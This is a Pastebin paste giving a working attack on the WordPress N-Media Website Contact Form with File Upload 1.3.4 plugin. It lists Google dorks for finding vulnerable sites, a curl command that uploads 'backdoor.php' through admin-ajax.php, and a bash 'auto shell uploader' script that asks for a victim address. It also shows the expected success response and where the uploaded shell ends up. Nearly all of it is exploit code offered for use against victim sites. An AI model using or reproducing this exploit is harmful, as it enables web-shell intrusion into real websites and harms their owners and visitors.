API tools faq
paste
Advertisement
r00tNEPAL

nulled.io ::: Wordpress Vuln Description

r00tNEPAL
Aug 1st, 2015
588
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.04 KB | None | 0 0
raw download clone embed print report
  1. 1. First Find Vulnerable Sites Using Dorks
  2. -----------------------------------------------------------------------------------------------------------------------------------
  3. Code:
  4. index of website-contact-form-with-file-upload
  5. index of /uploads/contact_files/
  6. inurl:"/uploads/contact_files/"
  7. -----------------------------------------------------------------------------------------------------------------------------------
  8. OR/THEN Add This To WP Site
  9. ----------------------------------------------------------------------------------------------------------------------------------
  10. Code:
  11. /wp-admin/admin-ajax.php
  12. -----------------------------------------------------------------------------------------------------------------------------------
  13. SCRIPTS::
  14.  
  15.  
  16.  
  17.  
  18.  
  19.  
  20. ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  21.  
  22.  
  23. There Are Two Methods,
  24. ==> Manually With Curl
  25.  
  26. ------------------------------------------------------------------------------------------------------------------------------
  27. ---------------------------------------------------------------------------------------------------------------------------------Code:
  28. curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nm_webcontact_upload_file" http://www.VICTIM.com/wp-admin/admin-ajax.php
  29. -------------------------------------------------------------------------------------------------------------------------------
  30. ----------------------------------------------------------------------------------------------------------------------------------
  31.  
  32.  
  33. ==>
  34. With Bash Script :
  35. ----------------------------------------------------------------------------------------------------------------------------------
  36. ----------------------------------------------------------------------------------------------------------------------------------
  37.  
  38. Code:
  39. #!/bin/bash
  40. #
  41. # Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4
  42. # Google Dork : inurl:"/uploads/contact_files/"
  43. # Exploit Author : Claudio Viviani
  44. # Vulnerability discovered by : Claudio Viviani
  45. # Script Written by : F17.c0de
  46. # Software link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
  47. # Version : 1.3.4
  48. # Tested on : Kali Linux 1.1.0a / Curl 7.26.0
  49. # Info: The "upload_file()" ajax function is affected from unrestircted file upload vulnerability
  50. # Response : {"status":"uploaded","filename":"YOURSHELL"}
  51. # Shell location http://VICTIM/wp-content/uploads/contact_files/YOURSHELL
  52.  
  53. echo '
  54. +------+
  55. | |
  56. | Wordpress N-Media Website Contact Form with File Upload 1.3.4 |
  57. | |
  58. +------+
  59. | |
  60. | Script by : F17.c0de |
  61. | Vuln Discovered by : Claudio Viviani |
  62. | Date : 15.04.2015 |
  63. | Google Dork : inurl:"/uploads/contact_files/" |
  64. | Vulnerability : "upload_file()" on admin-ajax.php |
  65. | Description : Auto shell uploader |
  66. | |
  67. +------+
  68. | No System is Safe |
  69. +------+
  70. '
  71.  
  72. echo -n -e "Path of your shell: "
  73. read bd
  74. echo -n -e "Victim address [ex: http://www.victim.com]: "
  75. read st
  76. sleep 1
  77. echo
  78. echo "Uploading Shell. . ."
  79. echo
  80.  
  81. curl -k -X POST -F "action=upload" -F "Filedata=@./$bd" -F "action=nm_webcontact_upload_file" $st/wp-admin/admin-ajax.php
  82.  
  83. echo
  84. echo
  85. echo "Job Finished"
  86. echo
  87. ----------------------------------------------------------------------------------------------------------------------------------
  88. ----------------------------------------------------------------------------------------------------------------------------------
  89.  
  90.  
  91. ==>
  92. If everything was done with success, you will see this response after executing CURL.
  93. ---------------------------------------------------------------------------------------------------------------------------------
  94. ---------------------------------------------------------------------------------------------------------------------------------
  95. Code:
  96. Response: {"status":"uploaded","filename":"1427927588-backdoor.php"}
  97.  
  98. ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  99. ==>
  100. Location:
  101.  
  102. ---------------------------------------------------------------------------------------------------------------------------------
  103. ---------------------------------------------------------------------------------------------------------------------------------
  104. Code:
  105. http://VICTIM/wp-content/uploads/contact_files/1427927588-backdoor.php
  106.  
  107. ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!